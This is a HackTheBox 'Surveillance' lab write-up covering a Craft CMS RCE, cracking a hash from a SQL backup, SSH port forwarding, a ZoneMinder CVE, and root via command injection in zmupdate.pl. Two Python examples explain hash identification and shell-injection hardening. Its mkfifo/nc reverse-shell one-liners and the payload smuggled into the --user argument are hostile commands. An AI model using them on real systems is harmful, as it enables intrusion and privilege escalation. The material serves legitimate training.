HTB - Surveillance
Tags: HackTheBox, Craft CMS, SQL, Port Forwarding, CVE
Exploiting Craft CMS, extracting a SQL backup, port forwarding to an internal service, and privilege escalation via zmupdate.pl.
2024-02-10 | Medium | HackTheBox
Reconnaissance
# /etc/hosts
10.10.11.245 surveillance.htb
nmap -p- -sV -v 10.10.11.245
Open ports:
- 22/tcp — SSH OpenSSH 8.9p1 Ubuntu
- 80/tcp — HTTP nginx 1.18.0
Exploitation — Craft CMS RCE
# attacker: listener for the reverse shell
nc -nlvp 4444
# target: payload executed through the Craft CMS RCE (LHOST = attacker IP)
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc LHOST 4444 >/tmp/f
Database extraction
# the backup filename also gives away the Craft CMS version (4.4.14)
unzip /html/craft/storage/backups/surveillance--2023-10-17-202801--v4.4.14.sql.zip
grep 'users' surveillance--2023-10-17-202801--v4.4.14.sql
Recovered hash (64 hex characters, i.e. a raw SHA-256 digest, hence hashcat mode 1400): 39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec
hashcat -m 1400 hash rockyou.txt
# matthew:starcraft122490
ssh matthew@10.10.11.245
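Before burning wordlist time, it is worth checking that the hash format actually matches the hashcat mode you picked. The script below is an added example and not part of the original write-up: it identifies the hash taken from the backup (the value above) by length and prefix, maps it to a hashcat mode, and runs a minimal SHA-256 wordlist check. The function names and the inline stand-in for rockyou.txt are assumptions for illustration, so it runs offline.

```python
#!/usr/bin/env python3
"""Added example (not from the original write-up): identify the hash pulled
from the Craft CMS backup, confirm the hashcat mode, and crack it with a
constructed mini wordlist."""
import hashlib
import re

# matthew's hash, copied from the users table in the SQL backup (page value).
MATTHEW_HASH = "39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec"

# Unsalted hex digests are recognisable by length alone; bcrypt by its prefix.
# Values are (algorithm, hashcat -m mode).
HEX_LEN_TO_MODE = {
    32: ("md5", 0),
    40: ("sha1", 100),
    64: ("sha256", 1400),
    128: ("sha512", 1700),
}


def identify(h: str):
    """Return (algorithm, hashcat_mode), or None if the format is not recognised."""
    if h.startswith(("$2a$", "$2b$", "$2y$")):
        # What Craft CMS normally stores (PHP password_hash); this backup did not.
        return ("bcrypt", 3200)
    if re.fullmatch(r"[0-9a-fA-F]+", h):
        return HEX_LEN_TO_MODE.get(len(h))
    return None


def sha256_hex(word: str) -> str:
    """Raw SHA-256 hex digest of a candidate password (what mode 1400 computes)."""
    return hashlib.sha256(word.encode()).hexdigest()


def crack(h: str, words):
    """Mini 'hashcat -m 1400': return the first word whose SHA-256 equals h,
    or None if the wordlist is exhausted. Refuses hashes that are not raw SHA-256."""
    algo = identify(h)
    if algo is None or algo[0] != "sha256":
        raise ValueError(f"not a raw SHA-256 hash: {h!r}")
    target = h.lower()
    for w in words:
        w = w.rstrip("\n")          # wordlist files carry trailing newlines
        if sha256_hex(w) == target:
            return w
    return None


# Constructed stand-in for rockyou.txt (the real list has ~14M entries).
WORDLIST = ["password", "123456", "surveillance", "craftcms", "starcraft122490", "matthew"]

if __name__ == "__main__":
    print("identified:", identify(MATTHEW_HASH))
    print("cracked:", crack(MATTHEW_HASH, WORDLIST))
```

If `identify` had returned bcrypt instead, mode 1400 would never produce a hit regardless of wordlist; that one check is what saves a wasted run.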
Lateral Movement — Port Forwarding
netstat -ntlp
# 8080 LISTEN (internal service, not reachable from outside the box)
# forward it: local port 8081 on the attacker now reaches 8080 on the target
ssh -L 8081:localhost:8080 matthew@10.10.11.245
CVE-2023-26035 (ZoneMinder, the service behind port 8080)
# second listener for the ZoneMinder shell
nc -nlvp 4445
# public PoC script (not reproduced here), pointed at the forwarded port
python3 exploit.py -t http://localhost:8081/ -ip LHOST -p 4445
# upgrade the shell to a pty
python3 -c 'import pty;pty.spawn("/bin/bash")'
Privilege Escalation — zmupdate.pl
# list sudo rights: zmupdate.pl may be run as root
sudo -l
nc -nlvp 4444
# the single quotes are consumed by the calling shell; zmupdate.pl receives the
# bare $( ) and places it unquoted in a shell command it runs as root, so the
# substitution executes with root privileges
sudo zmupdate.pl --version=1 \
--user=';$(rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc LHOST 4444 >/tmp/f)'
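Why a sudo rule on zmupdate.pl is a full root escalation: the --user value ends up inside a shell command string, so command substitution placed in it runs with the script's privileges. The block below is an added example, not ZoneMinder's code: it reproduces that pattern in Python with `echo` standing in for the backup tool so it runs offline. The helper names, the `zm` database name and the marker payload are assumptions. It shows the interpolated (vulnerable) form next to two hardened forms: passing an argv list (the Perl equivalent is the list form of `system()`), and quoting each operand when a shell string is unavoidable.

```python
#!/usr/bin/env python3
"""Added example (not ZoneMinder code): an argument interpolated into a shell
string is evaluated by the shell; an argv list or quoted operand is not."""
import shlex
import subprocess

# What the script receives after the calling shell strips the quotes from
# --user='$(...)'. The reverse shell is replaced by a harmless marker command.
PAYLOAD = "$(echo INJECTED)"

# Constructed stand-in for the real backup tool (mysqldump) so this runs offline.
BACKUP_TOOL = "echo"


def build_cmd_vulnerable(user: str, db: str = "zm") -> str:
    """Vulnerable pattern: string handed to /bin/sh, so $( ) and ; in `user`
    are parsed by the shell. Hypothetical shape, not the real zmupdate.pl line."""
    return f"{BACKUP_TOOL} --user={user} {db}"


def build_cmd_safe(user: str, db: str = "zm") -> list:
    """Hardened: argv list. The value is delivered as one argument and is
    never re-parsed by a shell."""
    return [BACKUP_TOOL, f"--user={user}", db]


def build_cmd_quoted(user: str, db: str = "zm") -> str:
    """Hardened when a shell string is unavoidable: every operand becomes a
    single-quoted literal, so metacharacters lose their meaning."""
    return f"{BACKUP_TOOL} --user={shlex.quote(user)} {shlex.quote(db)}"


def run_vulnerable(user: str) -> str:
    """Returns what the stand-in tool printed; INJECTED appearing in it means
    the shell executed the attacker's command."""
    r = subprocess.run(build_cmd_vulnerable(user), shell=True,
                       capture_output=True, text=True)
    return r.stdout.strip()


def run_safe(user: str) -> str:
    r = subprocess.run(build_cmd_safe(user), capture_output=True, text=True)
    return r.stdout.strip()


def run_quoted(user: str) -> str:
    r = subprocess.run(build_cmd_quoted(user), shell=True,
                       capture_output=True, text=True)
    return r.stdout.strip()


if __name__ == "__main__":
    print("vulnerable :", run_vulnerable(PAYLOAD))   # --user=INJECTED zm
    print("argv list  :", run_safe(PAYLOAD))         # --user=$(echo INJECTED) zm
    print("quoted str :", run_quoted(PAYLOAD))       # --user=$(echo INJECTED) zm
```

In the vulnerable run the `$(echo INJECTED)` is replaced by the shell before the tool ever sees it; in the box the same slot carried the mkfifo reverse shell and the shell doing the substitution belonged to root.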